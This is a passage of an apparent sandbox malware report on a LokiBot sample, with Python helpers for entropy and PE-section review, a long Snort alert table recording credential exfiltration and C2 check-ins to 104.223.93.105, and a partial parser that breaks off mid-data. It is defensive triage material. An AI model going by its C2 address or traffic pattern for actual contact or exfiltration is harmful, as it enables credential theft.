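    """Bits per byte, the section table's 'Entropy' column (0.0 constant, 8.0 uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_findings(sections, packed_threshold=7.0):
    """Reviewer checks over a section table: no file-backed bytes, large growth at load,
    high-entropy (packed) content, writable+executable. Returns (section, finding) pairs."""
    out = []
    for name, vsize, rsize, entropy, flags in sections:
        if rsize == 0 and vsize > 0:
            out.append((name, f"raw size 0, {vsize:#x} bytes zero-filled at load"))
        elif vsize > 4 * rsize:
            out.append((name, f"virtual size {vsize:#x} far exceeds raw size {rsize:#x}"))
        if entropy >= packed_threshold:
            out.append((name, f"entropy {entropy:.2f}: likely compressed or encrypted"))
        if "IMAGE_SCN_MEM_EXECUTE" in flags and "IMAGE_SCN_MEM_WRITE" in flags:
            out.append((name, "writable and executable"))
    return out
```

Run `imphash(IMPORTS)` and compare with the report's value; `section_findings(SECTIONS)` flags `.data` and `.ndata`, the two sections that are mostly or entirely absent from the file on disk. Nothing in this table is high-entropy, which is a second hint that the interesting bytes are not in any section at all but appended after `.rsrc`, where installer stubs keep their payload.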

                    Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                    Network Behavior

                    Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/14/22-09:24:21.210022 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49743 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:21.210022 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49743 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:21.210022 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49743 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:22.998234 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49744 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:22.998234 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:22.998234 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:24.618610 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49745 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:24.618610 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49745 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:24.618610 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:26.009494 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:26.009494 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49746 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:26.009494 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49746 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:27.434582 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49747 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:27.434582 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49747 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:27.434582 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49747 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:29.242787 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49748 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:29.242787 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49748 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:29.242787 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49748 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:31.358483 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49749 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:31.358483 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49749 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:31.358483 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49749 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:32.843753 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49750 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:32.843753 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49750 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:32.843753 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49750 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:34.253886 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49751 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:34.253886 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49751 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:34.253886 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49751 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:35.721894 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49752 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:35.721894 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49752 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:35.721894 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49752 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:37.035382 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49753 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:37.035382 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49753 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:37.035382 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49753 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:38.459969 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49754 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:38.459969 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49754 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:38.459969 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49754 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:41.014483 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49755 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:41.014483 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49755 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:41.014483 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49755 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:43.765625 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49758 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:43.765625 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49758 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:43.765625 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49758 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:46.465908 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49759 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:46.465908 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49759 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:46.465908 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49759 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:49.164147 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49760 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:49.164147 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49760 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:49.164147 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49760 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:50.858342 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49761 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:50.858342 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49761 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:50.858342 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49761 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:53.504302 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49762 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:53.504302 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49762 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:53.504302 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49762 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:54.799106 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49763 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:54.799106 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49763 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:54.799106 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49763 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:56.589624 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49764 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:56.589624 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49764 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:56.589624 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49764 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:58.517149 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49765 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:58.517149 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49765 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:58.517149 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49765 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:00.494413 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49766 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:00.494413 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49766 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:00.494413 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49766 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:02.175264 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49767 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:02.175264 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49767 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:02.175264 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49767 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:04.821827 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49769 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:04.821827 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49769 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:04.821827 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49769 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:07.361011 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49770 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:07.361011 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49770 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:07.361011 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49770 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:08.948329 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49771 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:08.948329 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49771 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:08.948329 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49771 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:10.960978 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49772 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:10.960978 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49772 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:10.960978 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49772 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:12.466061 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49781 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:12.466061 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49781 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:12.466061 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49781 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:13.878222 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49791 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:13.878222 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49791 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:13.878222 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49791 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:17.178733 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49809 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:17.178733 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49809 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:17.178733 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49809 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:20.254047 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49810 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:20.254047 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49810 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:20.254047 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49810 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:24.894113 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49811 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:24.894113 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49811 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:24.894113 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49811 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:27.413146 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49817 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:27.413146 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49817 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:27.413146 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49817 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:32.783225 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49818 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:32.783225 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49818 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:32.783225 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49818 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:35.615470 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49819 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:35.615470 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49819 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:35.615470 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49819 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:37.954643 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49821 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:37.954643 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49821 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:37.954643 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49821 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:40.432496 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49822 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:40.432496 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49822 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:40.432496 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49822 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:43.095141 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49830 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:43.095141 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49830 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:43.095141 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49830 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:44.516568 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49837 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:44.516568 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49837 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:44.516568 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49837 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:45.910085 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49844 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:45.910085 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49844 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:45.910085 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49844 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:47.885917 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49848 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:47.885917 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49848 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:47.885917 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49848 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:50.027789 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49849 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:50.027789 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49849 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:50.027789 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49849 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:53.334039 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49851 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:53.334039 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49851 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:53.334039 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49851 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:55.488936 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49852 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:55.488936 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49852 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:55.488936 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49852 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:58.848829 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49853 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:58.848829 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49853 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:25:58.848829 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49853 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:01.825690 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49854 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:01.825690 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49854 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:01.825690 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49854 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:03.549433 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49855 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:03.549433 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49855 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:03.549433 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49855 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:05.020305 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49856 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:05.020305 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49856 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:05.020305 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49856 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:06.500274 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49857 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:06.500274 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49857 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:06.500274 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49857 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:07.901534 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49858 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:07.901534 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49858 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:07.901534 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49858 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:09.260757 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49859 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:09.260757 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49859 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:09.260757 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49859 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:10.842581 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49860 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:10.842581 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49860 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:10.842581 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49860 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:12.247628 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49861 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:12.247628 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49861 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:12.247628 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49861 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:13.817317 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49862 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:13.817317 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49862 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:13.817317 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49862 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:15.234068 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49863 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:15.234068 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49863 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:15.234068 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49863 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:16.746339 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49864 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:16.746339 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49864 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:26:16.746339 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49864 | 80 | 192.168.2.3 | 104.223.93.105
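Read as a whole, the 168 alerts above are 56 TCP connections from 192.168.2.3 to 104.223.93.105:80 in under two minutes, with all three LokiBot rules (2024312 or 2024313, 2021641, 2025381) firing on the same packet of each connection. The first two connections are flagged as credential exfiltration, every later one as a request for commands, and consecutive connections are roughly one to five seconds apart. The Python below is an added example, not part of the report: it parses rows in this table's column layout and reduces them to what an analyst needs for a ticket, namely hits per SID, the C2 peer, and the check-in interval, collapsing the three-alert burst into one connection before measuring gaps. The embedded rows are the first five connections transcribed from the table above. A check-in interval measured in a sandbox characterises the sample, not a production alerting threshold; the regularity, not the absolute value, is what to hunt on.

```python
"""Turn the report's Snort alert rows into C2 facts: which rules fired, which peer was
contacted, and how often the bot checked in (added example, not part of the report)."""
from datetime import datetime
from statistics import median

# Rows transcribed from the report's alert table, column order
# Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP.
# Only the first five connections are included here.
ALERTS = """\
01/14/22-09:24:21.210022 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49743 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:21.210022 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49743 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:21.210022 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49743 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:22.998234 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49744 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:22.998234 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:22.998234 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:24.618610 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49745 | 80 | 192.168.2.3 | 104.223.93.105
01/14/22-09:24:24.618610 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49745 | 80 | 192.168.2.3 | 104.223.93.105
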